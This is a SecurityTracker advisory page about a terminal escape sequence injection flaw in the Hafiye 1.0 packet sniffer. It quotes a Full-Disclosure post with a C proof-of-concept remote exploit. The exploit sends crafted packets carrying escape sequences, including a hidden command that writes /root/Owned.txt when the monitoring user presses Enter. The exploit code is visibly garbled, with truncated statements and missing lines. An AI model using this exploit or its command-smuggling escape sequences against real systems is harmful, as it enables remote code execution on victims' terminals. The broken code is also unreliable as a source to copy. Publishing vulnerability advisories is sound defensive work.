Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   


Try our Premium Alert Service
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Become a Partner and License Our Database or Notification Service

Category:   Application (Generic)  >   Hafiye Vendors:   EnderUNIX SDT
Hafiye Lack of Terminal Escape Sequence Filtering May Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1011035
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 23 2004
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.0
Description:   A vulnerability was reported in the Hafiye sniffer. A remote user can inject terminal escape sequences to gain access to a target user's system.

Serkan Akpolat reported that the software does not filter the packet payload when displaying the payload on the terminal. A remote user can send specially crafted packets containing escape sequence payloads to a system monitored by Hafiye. If Hafiye has been started with the '-n' command line "count" option, the escape sequences can cause arbitrary code to be executed if the target user presses the Enter key after Hafiye has terminated.

Impact:   A remote user can cause arbitrary code to be executed on the target user's system.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.

 Source Message Contents

Subject:  [Full-Disclosure] Hafiye-1.0 Terminal Escape Sequence Injection Vulnerability

+-------[         Software         ]--------------+

Hafiye [1.0] "POSIX-compliant, customizable TCP/IP packet sniffer."

+-------[      Tested Versions     ]--------------+

Tested on:Linux(Hafiye compiled from tarball)
           FreeBSD 4.7 (Installed from CD)

+-------[      Vulnerability       ]--------------+

Packet Payload Terminal Escape Sequence Injection Vulnerability.

Results: DoS/Remote Root Comprimise

+-------[      Description         ]--------------+

Hafiye[1.0] is a POSIX-compliant, customizable TCP/IP packet sniffer.
It runs with uid0 privilege.

Hafiye-1.0 doesnt filter the payload when printing it to the terminal.
A malicious attacker can send packets with escape sequence payloads
to exploit this vulnerability.

If Hafiye has been started with -n packet count option ,
the vulnerability could allow remote code execution.
For remote code execution  the victim must press Enter after program exit.

+-------[         Contact          ]--------------+

+-------[ Proof Of Concept Exploit ]--------------+

/* Remote Exploit for Hafiye-1.0
** Terminal Escape Sequence Injection Vulnerability
** Written by Serkan Akpolat
** Homepage:
** E-mail:
** Greets: Virulent, gorny and all other netricians
#include <stdio.h>
#include <sys/types.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <stdlib.h>

typedef struct _target {
     char *host;
     u_short port;
     unsigned int sequence;
     unsigned int cnt;
} target;

char *esc_sequence[]= {"Escape Sequences",
                        "\x1b""]2;;echo Owned > /root/Owned.txt"
                        "Abnormal Termination""\x1b"

char use[] ="\t[ -h host ] [ -p port ] [ -e esc-seq-n ] [ -l number ]\n"
             "\t  Escape Sequences :\n"
             "\t1-Change TitleBar Text to \"Insecure?\"\n"
             "\t2-Ring The Bell\n"
             "\t3-Hidden Prompt to Create Owned.txt in /root\n"
             "\tExample: ./exp -h -p 80 -e 1 -l 1\n";

void usage()

int connect_to_host(char *host, u_short port)
     int sock = 0;
     struct hostent *hp;
     struct sockaddr_in sa;

     memset(&sa, 0, sizeof(sa));

     hp = gethostbyname(host);
     if (hp == NULL) {
     sa.sin_family = AF_INET;
     sa.sin_port = htons(port);
     sa.sin_addr = **((struct in_addr **) hp->h_addr_list);

     sock = socket(AF_INET, SOCK_STREAM, 0);
     if (sock < 0)

     if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)

     printf("[+] Connected to %s\n", host);
     return sock;

int main(int argc, char **argv)
     int i;
     int sock = 0;
     char buf[256]="\0";
     target target;
     while ((i = getopt(argc, argv, "h:p:e:l:")) != -1) {
         switch (i) {
             case 'h':
        = optarg;
             case 'p':
                 target.port = (u_short)atoi(optarg);
             case 'e':
                 target.sequence = atoi(optarg);
                 if(target.sequence < 1 || target.sequence > 3) {
             case 'l':
                 if(target.cnt<1) {
             case ':':
             case '?':
     if (optind != argc  || ! || !target.port ||
        !target.sequence || !target.cnt) {

     sock = connect_to_host(, target.port);

     printf("[+] Sending Escape Sequences\n");
     do {
         if (send(sock, buf, strlen(buf), 0) < 0) {
             printf("Socket Error\n");
     } while(target.cnt > 0);
     return 0;

Full-Disclosure - We believe in it.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, LLC